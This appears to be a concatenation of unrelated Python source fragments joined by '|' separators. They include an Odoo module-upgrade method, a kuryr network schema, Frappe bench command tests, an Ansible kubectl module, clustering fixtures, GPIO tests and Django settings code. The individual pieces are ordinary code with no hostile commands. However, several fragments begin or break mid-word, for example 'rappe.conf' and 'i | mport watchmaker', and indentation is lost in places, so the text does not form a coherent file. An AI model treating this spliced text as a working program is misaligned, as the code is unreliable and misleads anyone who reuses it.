        """Return the {module name: checksum} dict stored in config."""
        Icp = self.env['ir.config_parameter']
        return json.loads(Icp.get_param(PARAM_INSTALLED_CHECKSUMS, '{}'))

    @api.model
    def _save_checksums(self, checksums):
        """Persist a {module name: checksum} dict to config (as JSON)."""
        Icp = self.env['ir.config_parameter']
        Icp.set_param(PARAM_INSTALLED_CHECKSUMS, json.dumps(checksums))

    @api.model
    def _save_installed_checksums(self):
        """Recompute and store checksums for all installed modules."""
        checksums = {}
        installed_modules = self.search([('state', '=', 'installed')])
        for module in installed_modules:
            checksums[module.name] = module._get_checksum_dir()
        self._save_checksums(checksums)

    @api.model
    def _get_modules_partially_installed(self):
        """Modules stuck mid-operation (to install/remove/upgrade)."""
        return self.search([
            ('state', 'in', ('to install', 'to remove', 'to upgrade')),
        ])

    @api.model
    def _get_modules_with_changed_checksum(self):
        """Installed modules whose on-disk checksum differs from the
        one saved at the last successful upgrade."""
        saved_checksums = self._get_saved_checksums()
        installed_modules = self.search([('state', '=', 'installed')])
        return installed_modules.filtered(
            lambda r: r._get_checksum_dir() != saved_checksums.get(r.name),
        )

    @api.model
    def upgrade_changed_checksum(self, overwrite_existing_translations=False):
        """Run an upgrade of the database, upgrading only changed modules.

        Installed modules for which the checksum has changed since the
        last successful run of this method are marked "to upgrade",
        then the normal Odoo scheduled upgrade process
        is launched.
        If there is no module with a changed checksum, and no module in state
        other than installed, uninstalled, uninstallable, this method does
        nothing, otherwise the normal Odoo upgrade process is launched.
        After a successful upgrade, the checksums of installed modules are
        saved.
        In case of error during the upgrade, an exception is raised.
        If any module remains to upgrade or to uninstall after the upgrade
        process, an exception is raised as well.
        Note: this method commits the current transaction at each important
        step, it is therefore not intended to be run as part of a
        larger transaction.
        """
        _logger.info(
            "Checksum upgrade starting (i18n-overwrite=%s)...",
            overwrite_existing_translations
        )
        tools.config['overwrite_existing_translations'] = \
            overwrite_existing_translations
        _logger.info("Updating modules list...")
        self.update_list()
        changed_modules = self._get_modules_with_changed_checksum()
        if not changed_modules and not self._get_modules_partially_installed():
            _logger.info("No checksum change detected in installed modules "
                         "and all modules installed, nothing to do.")
            return
        _logger.info("Marking the following modules to upgrade, "
                     "for their checksums changed: %s...",
                     ','.join(changed_modules.mapped('name')))
        changed_modules.button_upgrade()
        self.env.cr.commit()  # pylint: disable=invalid-commit
        # in rare situations, button_upgrade may fail without
        # exception, this would lead to corruption because
        # no upgrade would be performed and save_installed_checksums
        # would update cheksums for modules that have not been upgraded
        ensure_module_state(self.env, changed_modules, 'to upgrade')
        _logger.info("Upgrading...")
        self.env['base.module.upgrade'].upgrade_module()
        self.env.cr.commit()  # pylint: disable=invalid-commit
        _logger.info("Upgrade successful, updating checksums...")
        self._save_installed_checksums()
        self.env.cr.commit()  # pylint: disable=invalid-commit
        partial_modules = self._get_modules_partially_installed()
        if partial_modules:
            raise IncompleteUpgradeError(
                "Checksum upgrade successful "
                "but incomplete for the following modules: %s" %
                ','.join(partial_modules.mapped('name'))
            )
        _logger.info("Checksum upgrade complete.")
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from kuryr.schemata import commons
# JSON draft-04 hyper-schema for the body of the libnetwork
# /NetworkDriver.DeleteEndpoint call: NetworkID and EndpointID are
# both required ids.
ENDPOINT_DELETE_SCHEMA = {
    u'links': [{
        u'method': u'POST',
        u'href': u'/NetworkDriver.DeleteEndpoint',
        u'description': u'Delete an Endpoint',
        u'rel': u'self',
        u'title': u'Delete'
    }],
    u'title': u'Delete endpoint',
    u'required': [u'NetworkID', u'EndpointID'],
    u'definitions': {u'commons': {}},
    u'$schema': u'http://json-schema.org/draft-04/hyper-schema',
    u'type': u'object',
    u'properties': {
        u'NetworkID': {
            u'description': u'Network ID',
            u'$ref': u'#/definitions/commons/definitions/id'
        },
        u'EndpointID': {
            u'description': u'Endpoint ID',
            u'$ref': u'#/definitions/commons/definitions/id'
        }
    }
}

# Inject the shared definitions so the $ref pointers above resolve.
ENDPOINT_DELETE_SCHEMA[u'definitions'][u'commons'] = commons.COMMONS
rappe.conf.admin_password,
"root_login": frappe.conf.root_login,
"root_password": frappe.conf.root_password,
"db_type": frappe.conf.db_type,
}
site_data = {"test_site": TEST_SITE, **global_config}
for key, value in global_config.items():
if value:
self.execute(f"bench set-config {key} {value} -g")
# test 1: bench restore from full backup
self.execute("bench --site {test_site} backup --ignore-backup-conf", site_data)
self.execute(
"bench --site {test_site} execute frappe.utils.backups.fetch_latest_backups",
site_data,
)
site_data.update({"database": json.loads(self.stdout)["database"]})
self.execute("bench --site {test_site} restore {database}", site_data)
# test 2: restore from partial backup
self.execute("bench --site {test_site} backup --exclude 'ToDo'", site_data)
site_data.update({"kw": "\"{'partial':True}\""})
self.execute(
"bench --site {test_site} execute"
" frappe.utils.backups.fetch_latest_backups --kwargs {kw}",
site_data,
)
site_data.update({"database": json.loads(self.stdout)["database"]})
self.execute("bench --site {test_site} restore {database}", site_data)
self.assertEqual(self.returncode, 1)
def test_partial_restore(self):
    """Back up only ToDo, drop its table, partial-restore, and verify
    the row count is unchanged."""
    _now = now()
    for num in range(10):
        frappe.get_doc({
            "doctype": "ToDo",
            "date": add_to_date(_now, days=num),
            "description": frappe.mock("paragraph")
        }).insert()
    frappe.db.commit()
    todo_count = frappe.db.count("ToDo")
    # check if todos exist, create a partial backup and see if the state is the same after restore
    self.assertIsNot(todo_count, 0)
    self.execute("bench --site {site} backup --only 'ToDo'")
    db_path = fetch_latest_backups(partial=True)["database"]
    self.assertTrue("partial" in db_path)
    frappe.db.sql_ddl("DROP TABLE IF EXISTS `tabToDo`")
    frappe.db.commit()
    self.execute("bench --site {site} partial-restore {path}", {"path": db_path})
    self.assertEqual(self.returncode, 0)
    self.assertEqual(frappe.db.count("ToDo"), todo_count)
def test_recorder(self):
    """start-recording / stop-recording toggle frappe.recorder.status()."""
    frappe.recorder.stop()
    self.execute("bench --site {site} start-recording")
    # reset the local cache (presumably so status() is re-read rather
    # than served from cache -- TODO confirm)
    frappe.local.cache = {}
    self.assertEqual(frappe.recorder.status(), True)
    self.execute("bench --site {site} stop-recording")
    frappe.local.cache = {}
    self.assertEqual(frappe.recorder.status(), False)
def test_remove_from_installed_apps(self):
    """remove-from-installed-apps drops an app from the site's app list."""
    app = "test_remove_app"
    add_to_installed_apps(app)
    # check: confirm that add_to_installed_apps added the app in the default
    self.execute("bench --site {site} list-apps")
    self.assertIn(app, self.stdout)
    # test 1: remove app from installed_apps global default
    self.execute("bench --site {site} remove-from-installed-apps {app}", {"app": app})
    self.assertEqual(self.returncode, 0)
    self.execute("bench --site {site} list-apps")
    self.assertNotIn(app, self.stdout)
def test_list_apps(self):
    """`bench list-apps`: sanity, app-list contents, and JSON formats."""
    # test 1: sanity check for command
    self.execute("bench --site all list-apps")
    self.assertIsNotNone(self.returncode)
    self.assertIsInstance(self.stdout or self.stderr, str)
    # test 2: bare functionality for single site
    self.execute("bench --site {site} list-apps")
    self.assertEqual(self.returncode, 0)
    # first whitespace-separated token of each output line is the app name
    list_apps = set(
        _x.split()[0] for _x in self.stdout.split("\n")
    )
    doctype = frappe.get_single("Installed Applications").installed_applications
    if doctype:
        installed_apps = set(x.app_name for x in doctype)
    else:
        installed_apps = set(frappe.get_installed_apps())
    self.assertSetEqual(list_apps, installed_apps)
    # test 3: parse json format
    self.execute("bench --site {site} list-apps --format json")
    self.assertEqual(self.returncode, 0)
    self.assertIsInstance(json.loads(self.stdout), dict)
    self.execute("bench --site {site} list-apps -f json")
    self.assertEqual(self.returncode, 0)
    self.assertIsInstance(json.loads(self.stdout), dict)
def test_show_config(self):
    """`bench show-config`: table output contains set keys; JSON parses."""
    # test 1: sanity check for command
    self.execute("bench --site all show-config")
    self.assertEqual(self.returncode, 0)
    # test 2: test keys in table text
    self.execute(
        "bench --site {site} set-config test_key '{second_order}' --parse",
        {"second_order": json.dumps({"test_key": "test_value"})},
    )
    self.execute("bench --site {site} show-config")
    self.assertEqual(self.returncode, 0)
    # nested keys are rendered dotted: test_key.test_key
    self.assertIn("test_key.test_key", self.stdout.split())
    self.assertIn("test_value", self.stdout.split())
    # test 3: parse json format
    self.execute("bench --site all show-config --format json")
    self.assertEqual(self.returncode, 0)
    self.assertIsInstance(json.loads(self.stdout), dict)
    self.execute("bench --site {site} show-config --format json")
    self.assertIsInstance(json.loads(self.stdout), dict)
    self.execute("bench --site {site} show-config -f json")
    self.assertIsInstance(json.loads(self.stdout), dict)
def test_get_bench_relative_path(self):
    """Files under the bench resolve to relative paths; missing files
    exit the process (SystemExit)."""
    bench_path = get_bench_path()
    test1_path = os.path.join(bench_path, "test1.txt")
    test2_path = os.path.join(bench_path, "sites", "test2.txt")
    with open(test1_path, "w+") as test1:
        test1.write("asdf")
    with open(test2_path, "w+") as test2:
        test2.write("asdf")
    self.assertTrue("test1.txt" in get_bench_relative_path("test1.txt"))
    self.assertTrue("sites/test2.txt" in get_bench_relative_path("test2.txt"))
    with self.assertRaises(SystemExit):
        get_bench_relative_path("test3.txt")
    os.remove(test1_path)
    os.remove(test2_path)
def test_frappe_site_env(self):
    """`bench execute` picks up the site from the FRAPPE_SITE env var."""
    # Assign through os.environ instead of os.putenv: putenv changes
    # only the C-level environment and leaves os.environ stale, so the
    # two views of the environment diverge (see the os module docs,
    # which recommend os.environ assignment).  Child processes inherit
    # the variable either way.
    os.environ['FRAPPE_SITE'] = frappe.local.site
    self.execute("bench execute frappe.ping")
    self.assertEqual(self.returncode, 0)
    self.assertIn("pong", self.stdout)
def test_version(self):
    """`bench version` succeeds for all known formats and rejects
    unknown ones with exit code 2."""
    self.execute("bench version")
    self.assertEqual(self.returncode, 0)
    for output in ["legacy", "plain", "table", "json"]:
        self.execute(f"bench version -f {output}")
        self.assertEqual(self.returncode, 0)
    # an invalid format choice is rejected with exit code 2
    self.execute("bench version -f invalid")
    self.assertEqual(self.returncode, 2)
def test_set_password(self):
    """set-password / set-admin-password update the stored credential."""
    from frappe.utils.password import check_password
    self.execute("bench --site {site} set-password Administrator test1")
    self.assertEqual(self.returncode, 0)
    self.assertEqual(check_password('Administrator', 'test1'), 'Administrator')
    # to release the lock taken by check_password
    frappe.db.commit()
    self.execute("bench --site {site} set-admin-password test2")
    self.assertEqual(self.returncode, 0)
    self.assertEqual(check_password('Administrator', 'test2'), 'Administrator')
def test_make_app(self):
    """`bench make-app` scaffolds a new app from interactive answers."""
    # answers fed to the interactive prompts, in prompt order
    user_input = [
        b"Test App",  # title
        b"This app's description contains 'single quotes' and \"double quotes\".",  # description
        b"Test Publisher",  # publisher
        b"example@example.org",  # email
        b"",  # icon
        b"",  # color
        b"MIT"  # app_license
    ]
    app_name = "testapp0"
    apps_path = os.path.join(get_bench_path(), "apps")
    test_app_path = os.path.join(apps_path, app_name)
    self.execute(f"bench make-app {apps_path} {app_name}", {"cmd_input": b'\n'.join(user_input)})
    self.assertEqual(self.returncode, 0)
    self.assertTrue(
        os.path.exists(test_app_path)
    )
    # cleanup
    shutil.rmtree(test_app_path)
@skipIf(
    not (
        frappe.conf.root_password
        and frappe.conf.admin_password
        and frappe.conf.db_type == "mariadb"
    ),
    "DB Root password and Admin password not set in config"
)
def test_bench_drop_site_should_archive_site(self):
    """drop-site removes sites/<site> and moves it to archived/sites."""
    # TODO: Make this test postgres compatible
    site = TEST_SITE
    self.execute(
        f"bench new-site {site} --force --verbose "
        f"--admin-password {frappe.conf.admin_password} "
        f"--mariadb-root-password {frappe.conf.root_password} "
        f"--db-type {frappe.conf.db_type or 'mariadb'} "
    )
    self.assertEqual(self.returncode, 0)
    self.execute(f"bench drop-site {site} --force --root-password {frappe.conf.root_password}")
    self.assertEqual(self.returncode, 0)
    bench_path = get_bench_path()
    site_directory = os.path.join(bench_path, f'sites/{site}')
    self.assertFalse(os.path.exists(site_directory))
    archive_directory = os.path.join(bench_path, f'archived/sites/{site}')
    self.assertTrue(os.path.exists(archive_directory))
class TestBackups(BaseTestCommands):
backup_map = {
"includes": {
"includes": [
|
, and stop resources within a Kubernetes Cluster
version_added: "2.0"
options:
name:
required: false
default: null
description:
- The name associated with resource
filename:
required: false
default: null
description:
- The path and filename of the resource(s) definition file(s).
- To operate on several files this can accept a comma separated list of files or a list of files.
aliases: [ 'files', 'file', 'filenames' ]
kubectl:
required: false
default: null
description:
- The path to the kubectl bin
namespace:
required: false
default: null
description:
- The namespace associated with the resource(s)
resource:
required: false
default: null
description:
- The resource to perform an action on. pods (po), replicationControllers (rc), services (svc)
label:
required: false
default: null
description:
- The labels used to filter specific resources.
server:
required: false
default: null
description:
- The url for the API server that commands are executed against.
force:
required: false
default: false
description:
- A flag to indicate to force delete, replace, or stop.
all:
required: false
default: false
description:
- A flag to indicate delete all, stop all, or all namespaces when checking exists.
log_level:
required: false
default: 0
description:
- Indicates the level of verbosity of logging by kubectl.
state:
required: false
choices: ['present', 'absent', 'latest', 'reloaded', 'stopped']
default: present
description:
- present handles checking existence or creating if definition file provided,
absent handles deleting resource(s) based on other options,
latest handles creating or updating based on existence,
reloaded handles updating resource(s) definition using definition file,
stopped handles stopping resource(s) based on other options.
requirements:
- kubectl
author: "Kenny Jones (@kenjones-cisco)"
"""
EXAMPLES = """
- name: test nginx is present
kube: name=nginx resource=rc state=present
- name: test nginx is stopped
kube: name=nginx resource=rc state=stopped
- name: test nginx is absent
kube: name=nginx resource=rc state=absent
- name: test nginx is present
kube: filename=/tmp/nginx.yml
- name: test nginx and postgresql are present
kube: files=/tmp/nginx.yml,/tmp/postgresql.yml
- name: test nginx and postgresql are present
kube:
files:
- /tmp/nginx.yml
- /tmp/postgresql.yml
"""
class KubeManager(object):
    """Thin wrapper around the ``kubectl`` binary.

    Derives the global command-line flags from the Ansible module
    parameters once, then exposes create/replace/delete/exists/stop
    helpers that shell out via ``module.run_command``.
    """

    def __init__(self, module):
        self.module = module
        # An explicit `kubectl` param wins; otherwise require it on $PATH.
        self.kubectl = module.params.get('kubectl')
        if self.kubectl is None:
            self.kubectl = module.get_bin_path('kubectl', True)

        # Flags shared by every kubectl invocation.
        self.base_cmd = [self.kubectl]
        for param, flag in (('server', '--server='),
                            ('log_level', '--v='),
                            ('namespace', '--namespace=')):
            value = module.params.get(param)
            if value:
                self.base_cmd.append(flag + str(value))

        self.all = module.params.get('all')
        self.force = module.params.get('force')
        self.name = module.params.get('name')
        self.filename = [f.strip() for f in module.params.get('filename') or []]
        self.resource = module.params.get('resource')
        self.label = module.params.get('label')

    def _execute(self, cmd):
        """Run kubectl with *cmd* appended; abort the module on any failure."""
        full_cmd = self.base_cmd + cmd
        try:
            rc, out, err = self.module.run_command(full_cmd)
            if rc != 0:
                self.module.fail_json(
                    msg='error running kubectl (%s) command (rc=%d), out=\'%s\', err=\'%s\'' % (' '.join(full_cmd), rc, out, err))
        except Exception as exc:
            self.module.fail_json(
                msg='error running kubectl (%s) command: %s' % (' '.join(full_cmd), str(exc)))
        return out.splitlines()

    def _execute_nofail(self, cmd):
        """Run kubectl; return None on a non-zero exit instead of failing."""
        rc, out, err = self.module.run_command(self.base_cmd + cmd)
        return None if rc != 0 else out.splitlines()

    def create(self, check=True, force=True):
        """Apply the configured definition file(s); no-op when already present."""
        if check and self.exists():
            return []
        if not self.filename:
            self.module.fail_json(msg='filename required to create')
        cmd = ['apply']
        if force:
            cmd.append('--force')
        cmd.append('--filename=' + ','.join(self.filename))
        return self._execute(cmd)

    def replace(self, force=True):
        """Re-apply the configured definition file(s) unconditionally."""
        if not self.filename:
            self.module.fail_json(msg='filename required to reload')
        cmd = ['apply']
        if force:
            cmd.append('--force')
        cmd.append('--filename=' + ','.join(self.filename))
        return self._execute(cmd)

    def delete(self):
        """Delete by file, or by resource [name] [--selector=label]."""
        if not self.force and not self.exists():
            return []
        cmd = ['delete']
        if self.filename:
            cmd.append('--filename=' + ','.join(self.filename))
        else:
            if not self.resource:
                self.module.fail_json(msg='resource required to delete without filename')
            cmd.append(self.resource)
            if self.name:
                cmd.append(self.name)
            if self.label:
                cmd.append('--selector=' + self.label)
            if self.all:
                cmd.append('--all')
            if self.force:
                cmd.append('--ignore-not-found')
        return self._execute(cmd)

    def exists(self):
        """Return True when `kubectl get` finds at least one matching object."""
        cmd = ['get']
        if self.filename:
            cmd.append('--filename=' + ','.join(self.filename))
        else:
            if not self.resource:
                self.module.fail_json(msg='resource required without filename')
            cmd.append(self.resource)
            if self.name:
                cmd.append(self.name)
            if self.label:
                cmd.append('--selector=' + self.label)
            if self.all:
                cmd.append('--all-namespaces')
        cmd.append('--no-headers')
        # _execute_nofail yields None on error, [] on no output; both mean "absent".
        return bool(self._execute_nofail(cmd))

    # TODO: This is currently unused, perhaps convert to 'scale' with a replicas param?
    def stop(self):
        """Stop by file, or by resource [name] [--selector=label]."""
        if not self.force and not self.exists():
            return []
        cmd = ['stop']
        if self.filename:
            cmd.append('--filename=' + ','.join(self.filename))
        else:
            if not self.resource:
                self.module.fail_json(msg='resource required to stop without filename')
            cmd.append(self.resource)
            if self.name:
                cmd.append(self.name)
            if self.label:
                cmd.append('--selector=' + self.label)
            if self.all:
                cmd.append('--all')
            if self.force:
                cmd.append('--ignore-not-found')
        return self._execute(cmd)
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(),
filename=dict(type='list', aliases=['files', 'file', 'filenames']),
namespace=dict(),
resource=dict(),
label=dict(),
server=dict(),
kubectl=dict(),
force=dict(default=False, type='bool'),
all=dict(default=False, type='bool'),
log_level=dict(default=0, type='int'),
state=dict(default='present', choices=['present', 'absent', 'latest', 'reloaded', 'stopped']),
),
mutually_exclusive=[['filename', 'list']]
)
changed = False
manager = KubeManager(module)
state = module.params.get('state')
if state == 'present':
result = manager.create(check=False)
elif state == 'absent':
result = manager.delete()
elif state == 'reloaded':
result = manager.replace()
elif state == 'stopped':
result = manager.stop()
|
'''
Created on 26/09/2014
@author: javgar119
'''
# Test fixtures for a clustering / closest-pair routine.
# NOTE(review): `Cluster` must be imported/defined elsewhere in this module;
# from usage here its signature looks like
# Cluster(point_set, horiz_center, vert_center, population, risk) -- confirm.

# Two unit clusters one x-unit apart.
cluster_list = ([Cluster(set([]), 0, 0, 1, 0),
                 Cluster(set([]), 1, 0, 1, 0)])

# Twenty unit clusters evenly spaced along the x axis.
cluster_list2 = ([Cluster(set([]), 0, 0, 1, 0),
                  Cluster(set([]), 1, 0, 1, 0),
                  Cluster(set([]), 2, 0, 1, 0),
                  Cluster(set([]), 3, 0, 1, 0),
                  Cluster(set([]), 4, 0, 1, 0),
                  Cluster(set([]), 5, 0, 1, 0),
                  Cluster(set([]), 6, 0, 1, 0),
                  Cluster(set([]), 7, 0, 1, 0),
                  Cluster(set([]), 8, 0, 1, 0),
                  Cluster(set([]), 9, 0, 1, 0),
                  Cluster(set([]), 10, 0, 1, 0),
                  Cluster(set([]), 11, 0, 1, 0),
                  Cluster(set([]), 12, 0, 1, 0),
                  Cluster(set([]), 13, 0, 1, 0),
                  Cluster(set([]), 14, 0, 1, 0),
                  Cluster(set([]), 15, 0, 1, 0),
                  Cluster(set([]), 16, 0, 1, 0),
                  Cluster(set([]), 17, 0, 1, 0),
                  Cluster(set([]), 18, 0, 1, 0),
                  Cluster(set([]), 19, 0, 1, 0)])

# Expected results appear to be (distance, index1, index2) tuples -- all
# adjacent pairs are exactly 1.0 apart in the lists above.
expected = set([(1.0, 0, 1)])
expected2 = set([(1.0, 9, 10), (1.0, 2, 3), (1.0, 15, 16),
                 (1.0, 11, 12), (1.0, 13, 14), (1.0, 16, 17),
                 (1.0, 14, 15), (1.0, 12, 13), (1.0, 4, 5),
                 (1.0, 18, 19), (1.0, 3, 4), (1.0, 8, 9),
                 (1.0, 17, 18), (1.0, 6, 7), (1.0, 7, 8),
                 (1.0, 5, 6), (1.0, 10, 11), (1.0, 0, 1), (1.0, 1, 2)])

# Ten clusters at arbitrary 2-D positions; single expected closest pair.
cluster_list3 = ([Cluster(set([]), 90.9548590217, -17.089022585, 1, 0),
                  Cluster(set([]), 90.2536656675, -70.5911544718, 1, 0),
                  Cluster(set([]), -57.5872347006, 99.7124028905, 1, 0),
                  Cluster(set([]), -15.9338519877, 5.91547495626, 1, 0),
                  Cluster(set([]), 19.1869055492, -28.0681513017, 1, 0),
                  Cluster(set([]), -23.0752410653, -42.1353490324, 1, 0),
                  Cluster(set([]), -65.1732261872, 19.675582646, 1, 0),
                  Cluster(set([]), 99.7789872101, -11.2619165604, 1, 0),
                  Cluster(set([]), -43.3699854405, -94.7349852817, 1, 0),
                  Cluster(set([]), 48.2281912402, -53.3441788034, 1, 0)])
expected3 = set([(10.5745166749, 0, 7)])
from rpitc.io import IO
class TestOut:
    """Tests for the GPIO output wrapper (rpitc.io.out.Out).

    The `gpio` and `out` arguments are pytest fixtures supplied by the
    project's conftest -- `out` is presumably a ready-made Out instance.
    """

    def test_init_on(self, gpio):
        # Constructing with status=IO.ON must leave the pin switched on.
        from rpitc.io.out import Out
        out = Out(7, status=IO.ON)
        assert out.status == IO.ON
        out.off()

    def test_set_pin(self, out):
        # set_pin returns the status it was asked to set.
        assert out.set_pin(IO.ON) == IO.ON

    def test_on(self, out):
        out.on()
        assert out.status == IO.ON

    def test_off(self, out):
        out.off()
        assert out.status == IO.OFF

    def test_toggle(self, out):
        # toggle() flips the status: OFF -> ON -> OFF.
        out.off()
        out.toggle()
        assert out.status == IO.ON
        out.toggle()
        assert out.status == IO.OFF
|
import pytest
i | mport watchmaker
@pytest.fixture
def setup_object():
    """Placeholder fixture; currently provides no setup."""
    pass
def test_main():
    """Smoke-test the package version attribute.

    The original assertion compared ``watchmaker.__version__`` to itself,
    which can never fail; assert something meaningful instead: the
    version exists and is a non-empty string.
    """
    assert isinstance(watchmaker.__version__, str)
    assert watchmaker.__version__
|
import os
import threading
import time
from django.conf import settings
from django.db import connections
from django.dispatch import receiver
from django.test.signals import setting_changed
from django.utils import timezone
from django.utils.functional import empty
# Most setting_changed receivers are supposed to be added below,
# except for cases where the receiver is related to a contrib app.
@receiver(setting_changed)
def clear_cache_handlers(**kwargs):
    """Forget every memoized cache backend when CACHES is overridden."""
    if kwargs['setting'] != 'CACHES':
        return
    from django.core.cache import caches
    # A fresh thread-local drops all previously constructed backends.
    caches._caches = threading.local()
@receiver(setting_changed)
def update_connections_time_zone(**kwargs):
    """Keep the process, Django-level and database time zones in sync
    when TIME_ZONE or USE_TZ is overridden (e.g. by override_settings)."""
    if kwargs['setting'] == 'TIME_ZONE':
        # Reset process time zone
        if hasattr(time, 'tzset'):
            if kwargs['value']:
                os.environ['TZ'] = kwargs['value']
            else:
                os.environ.pop('TZ', None)
            time.tzset()
        # Reset local time zone cache
        timezone.get_default_timezone.cache_clear()
    # Reset the database connections' time zone
    if kwargs['setting'] == 'USE_TZ' and settings.TIME_ZONE != 'UTC':
        USE_TZ, TIME_ZONE = kwargs['value'], settings.TIME_ZONE
    elif kwargs['setting'] == 'TIME_ZONE' and not settings.USE_TZ:
        USE_TZ, TIME_ZONE = settings.USE_TZ, kwargs['value']
    else:
        # no need to change the database connections' time zones
        return
    # With USE_TZ the database works in UTC; otherwise in local TIME_ZONE.
    tz = 'UTC' if USE_TZ else TIME_ZONE
    for conn in connections.all():
        conn.settings_dict['TIME_ZONE'] = tz
        tz_sql = conn.ops.set_time_zone_sql()
        if tz_sql:
            conn.cursor().execute(tz_sql, [tz])
@receiver(setting_changed)
def clear_serializers_cache(**kwargs):
    """Drop registered serializers when SERIALIZATION_MODULES changes."""
    if kwargs['setting'] != 'SERIALIZATION_MODULES':
        return
    from django.core import serializers
    serializers._serializers = {}
@receiver(setting_changed)
def language_changed(**kwargs):
    """Reset translation machinery caches when i18n settings change."""
    changed = kwargs['setting']
    if changed in ('LANGUAGES', 'LANGUAGE_CODE', 'LOCALE_PATHS'):
        from django.utils.translation import trans_real
        trans_real._default = None
        trans_real._active = threading.local()
        # Loaded catalogs depend only on LANGUAGES / LOCALE_PATHS
        # (this is a subset of the settings handled above).
        if changed in ('LANGUAGES', 'LOCALE_PATHS'):
            trans_real._translations = {}
            trans_real.check_for_language.cache_clear()
@receiver(setting_changed)
def file_storage_changed(**kwargs):
    """Rebuild the lazy default_storage when a file-storage setting changes."""
    if kwargs['setting'] in (
        'DEFAULT_FILE_STORAGE',
        'FILE_UPLOAD_DIRECTORY_PERMISSIONS',
        'FILE_UPLOAD_PERMISSIONS',
        'MEDIA_ROOT',
        'MEDIA_URL',
    ):
        from django.core.files.storage import default_storage
        # Assigning `empty` makes the LazyObject re-instantiate on next access.
        default_storage._wrapped = empty
@receiver(setting_changed)
def root_urlconf_changed(**kwargs):
    """Flush URL-resolver caches when ROOT_URLCONF is overridden."""
    if kwargs['setting'] != 'ROOT_URLCONF':
        return
    from django.core.urlresolvers import clear_url_caches, set_urlconf
    clear_url_caches()
    set_urlconf(None)
@receiver(setting_changed)
def static_storage_changed(**kwargs):
    """Rebuild the lazy staticfiles storage when a static setting changes."""
    if kwargs['setting'] not in ('STATICFILES_STORAGE', 'STATIC_ROOT', 'STATIC_URL'):
        return
    from django.contrib.staticfiles.storage import staticfiles_storage
    # Assigning `empty` makes the LazyObject re-instantiate on next access.
    staticfiles_storage._wrapped = empty
|
# coding:utf-8
"""
Django settings for turbo project.

Generated by 'django-admin startproject' using Django 1.11.1.

For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/

For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""

import datetime
import os

import turbosettings.parameters as parameters
from turbosettings.generate_secret_key import secret_key_from_file

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
PROJECT_PATH = os.path.realpath(os.path.dirname(__file__))

USE_X_FORWARDED_HOST = False
FORCE_SCRIPT_NAME = ""

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = secret_key_from_file('secret_key')

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []

# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'rest_framework',
    'songwriter',
    'corsheaders',
    'debug_toolbar',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'corsheaders.middleware.CorsMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'debug_toolbar.middleware.DebugToolbarMiddleware',
]

ROOT_URLCONF = 'turbosettings.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': parameters.TEMPLATES_DIRS if parameters.TEMPLATES_DIRS else [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
                'django.template.context_processors.media',
            ],
            'builtins': [
                'django.templatetags.i18n',
                'django.contrib.humanize.templatetags.humanize',
                'django.contrib.staticfiles.templatetags.staticfiles',
            ],
        },
    },
]

WSGI_APPLICATION = 'turbosettings.wsgi.application'

CORS_ORIGIN_WHITELIST = [
    'localhost:8080',
    '127.0.0.1:8080',
]

# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/

LANGUAGE_CODE = 'fr'

TIME_ZONE = "Europe/Paris"

USE_I18N = True

USE_L10N = True

USE_TZ = True


def gettext(x):
    """Identity marker so literals below are collected by makemessages."""
    return x


LANGUAGES = (
    ('fr', gettext('Français')),
    ('en', gettext('English')),
)

LOCALE_PATHS = (
    os.path.join(BASE_DIR, 'locale/'),
)

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/

STATIC_URL = FORCE_SCRIPT_NAME + "/static/"
STATIC_ROOT = BASE_DIR + '/static/'
STATICFILES_DIRS = parameters.STATICFILES_DIRS if parameters.STATICFILES_DIRS else (
    "assets/",
)

# BUG FIX: the original read `FIXTURE_DIRS = ('fixtures/')`, which is a
# plain string (no trailing comma), so Django would iterate it character
# by character. It must be a tuple/list of directories.
FIXTURE_DIRS = (
    'fixtures/',
)

MEDIA_URL = '/'
MEDIA_ROOT = BASE_DIR + '/media/'

REST_FRAMEWORK = {
    'DEFAULT_PERMISSION_CLASSES': (
